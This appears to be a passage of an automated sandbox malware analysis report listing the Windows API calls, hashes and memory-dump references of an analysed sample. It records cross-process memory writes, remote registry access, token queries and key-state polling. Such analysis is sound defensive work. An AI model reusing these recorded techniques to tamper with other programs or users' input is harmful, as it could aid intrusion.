                                                                                                                                                                                • Part of subcall function 004ED623: GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                                                                                                                                                • Part of subcall function 004ED623: AttachThreadInput.USER32(00000000), ref: 004ED661
                                                                                                                                                                              • GetFocus.USER32 ref: 004ED7FB
                                                                                                                                                                                • Part of subcall function 004ED66C: GetParent.USER32(?), ref: 004ED67A
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004ED844
                                                                                                                                                                              • EnumChildWindows.USER32(?,004ED8BA), ref: 004ED86C
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004ED886
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                              • String ID: %s%d
                                                                                                                                                                              • API String ID: 1941087503-1110647743
                                                                                                                                                                              APIs
                                                                                                                                                                              • __lock.LIBCMT ref: 004D8768
                                                                                                                                                                                • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                                                                                                                                                • Part of subcall function 004D8984: EnterCriticalSection.KERNEL32(004D0127,?,004D876D,0000000D), ref: 004D89AF
                                                                                                                                                                              • InterlockedIncrement.KERNEL32(DC840F00), ref: 004D8775
                                                                                                                                                                              • __lock.LIBCMT ref: 004D8789
                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 004D87A7
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                              • String ID: PS
                                                                                                                                                                              • API String ID: 1687444384-489029678
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005118E4
                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00511917
                                                                                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00511A3A
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00511AB0
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2364364464-0
                                                                                                                                                                              • Opcode ID: 3d7aff12daab0bc37e1d3f1eebd79ad5e1864f935bff505c9768f7aeb9685ebf
                                                                                                                                                                              • Instruction ID: 746d936ccc06fb4a327df516f2205442cf434aa423c7b1a55cdfc548e8d41e6d
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d7aff12daab0bc37e1d3f1eebd79ad5e1864f935bff505c9768f7aeb9685ebf
                                                                                                                                                                              • Instruction Fuzzy Hash: F2818474A50204ABDF149F65C885FADBBF5BF44724F14805EF905AF382D7B8E9408B98
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005105DF
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0051066E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0051068C
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 005106D2
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 005106EC
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 327935632-0
                                                                                                                                                                              • Opcode ID: daa2cc96b88e04e671ea1edba38c232f57382a5eed41fe9afa8f18e4a68231ee
                                                                                                                                                                              • Instruction ID: 0a947df72abcbd8d9afc8049353227e915023ab15842b29dde0f778ac2771222
                                                                                                                                                                              • Opcode Fuzzy Hash: daa2cc96b88e04e671ea1edba38c232f57382a5eed41fe9afa8f18e4a68231ee
                                                                                                                                                                              • Instruction Fuzzy Hash: 6C518E75A002059FDB00EFA8C4909EDFBB5FF58314B1480AAE945AB391DB74ED85CBA4
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512DE0
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512E1F
                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00512E66
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00512E92
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00512E9F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3440857362-0
                                                                                                                                                                              • Opcode ID: e85b466a66706b2d9b553c67428b864b0ccada52f06c526c264f0b01f09ede50
                                                                                                                                                                              • Instruction ID: cf1cfa36ef8d88a002c7c89784322a2f338a4ac976c5048892f45e47883d7240
                                                                                                                                                                              • Opcode Fuzzy Hash: e85b466a66706b2d9b553c67428b864b0ccada52f06c526c264f0b01f09ede50
                                                                                                                                                                              • Instruction Fuzzy Hash: 72518E31204205AFD704EF65C881EABBBF9FF88708F00491EF585872A1EB35E955DB62
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                                                                                                                                              • Instruction ID: 0c4374ef216abe855216e27854b839bfddca5707f611650429308800829360b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                                                                                                                                              • Instruction Fuzzy Hash: 94412435944144AFEB20DB68DC89FE9BF79FB09320F544255F829E72D0C7729D80EAA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005017D4
                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005017FD
                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0050183C
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00501861
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00501869
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1389676194-0
                                                                                                                                                                              • Opcode ID: 131a2101ca62fc00898e17120c35cc6b56da13a11efc9ca3c9abf8d1de1ba4bc
                                                                                                                                                                              • Instruction ID: 4bdbc4669fa4da2cb42ede6a70e4dee7a169cc5ab4905f01b475f023029b6775
                                                                                                                                                                              • Opcode Fuzzy Hash: 131a2101ca62fc00898e17120c35cc6b56da13a11efc9ca3c9abf8d1de1ba4bc
                                                                                                                                                                              • Instruction Fuzzy Hash: 35412935A00605EFCB01EF65C981AAEBBF5FF48314B14809AF805AB362DB35ED01DB65
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(000000FF), ref: 004CB749
                                                                                                                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4210589936-0
                                                                                                                                                                              • Opcode ID: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                                                                                                                                              • Instruction ID: e5f94dc5b858bf2ac667ee4e58fe19204a2af5f6693435fb59d08d2e39d5a33e
                                                                                                                                                                              • Opcode Fuzzy Hash: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                                                                                                                                              • Instruction Fuzzy Hash: 8541AD35504119BBDF159F64C845FEABBB8FF45324F20421AF828922D0C734AD94DBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004EC156
                                                                                                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 004EC200
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004EC208
                                                                                                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 004EC216
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004EC21E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3382505437-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004EE9CD
                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004EE9EA
                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004EEA22
                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004EEA48
                                                                                                                                                                              • _wcsstr.LIBCMT ref: 004EEA52
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3902887630-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051DCC0
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0051DCE4
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0051DCFC
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0051DD24
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0050407D,00000000), ref: 0051DD42
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2294984445-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004ECA86
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAB8
                                                                                                                                                                              • __itow.LIBCMT ref: 004ECAD0
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAF6
                                                                                                                                                                              • __itow.LIBCMT ref: 004ECB07
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2983881199-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 005089CE
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 005089E5
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00508A21
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00508A2D
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00508A68
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                                                                                                                                              • BeginPath.GDI32(?), ref: 004CB611
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3225163088-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004D2E81
                                                                                                                                                                              • CreateThread.KERNEL32(?,?,004D2FB7,00000000,?,?), ref: 004D2EC5
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004D2ECF
                                                                                                                                                                              • _free.LIBCMT ref: 004D2ED8
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004D2EE3
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                                                                                                                                              • GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,004EB3CB,?,?,?), ref: 004EB923
                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F8371
                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F837F
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F8387
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F8391
                                                                                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                                                                                                                                              APIs
                                                                                                                                                                              • CLSIDFromProgID.OLE32 ref: 004EA874
                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 004EA88F
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004EA8AD
                                                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 004EA8B9
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004EB806
                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004EB810
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB81F
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB826
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB83C
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004EB7A5
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004EB7AF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004EB7BE
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004EB7C5
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004EB7DB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004EFA8F
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 004EFAA6
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 004EFABE
                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 004EFADA
                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 004EFAF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • EndPath.GDI32(?), ref: 004CB526
                                                                                                                                                                              • StrokeAndFillPath.GDI32(?,?,0052F583,00000000,?), ref: 004CB542
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004CB555
                                                                                                                                                                              • DeleteObject.GDI32 ref: 004CB568
                                                                                                                                                                              • StrokePath.GDI32(?), ref: 004CB583
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2625713937-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004FFAB2
                                                                                                                                                                              • CoCreateInstance.OLE32(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FFACA
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004FFD2D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 2683427295-24824748
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #$+
                                                                                                                                                                              • API String ID: 0-2552117581
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0054DC40,?,0000000F,0000000C,00000016,0054DC40,?), ref: 004F507B
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004BB8A7: _memmove.LIBCMT ref: 004BB8FB
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004F50FB
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                                              • String ID: REMOVE$THIS
                                                                                                                                                                              • API String ID: 2528338962-776492005
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004EC9FE,?,?,00000034,00000800,?,00000034), ref: 004F4D6B
                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004ECFC9
                                                                                                                                                                                • Part of subcall function 004F4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ECA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 004F4D36
                                                                                                                                                                                • Part of subcall function 004F4C65: GetWindowThreadProcessId.USER32(?,?), ref: 004F4C90
                                                                                                                                                                                • Part of subcall function 004F4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CA0
                                                                                                                                                                                • Part of subcall function 004F4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CB6
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED036
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED083
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0054DBF0,00000000,?,?,?,?), ref: 0051A4E6
                                                                                                                                                                              • GetWindowLongW.USER32 ref: 0051A503
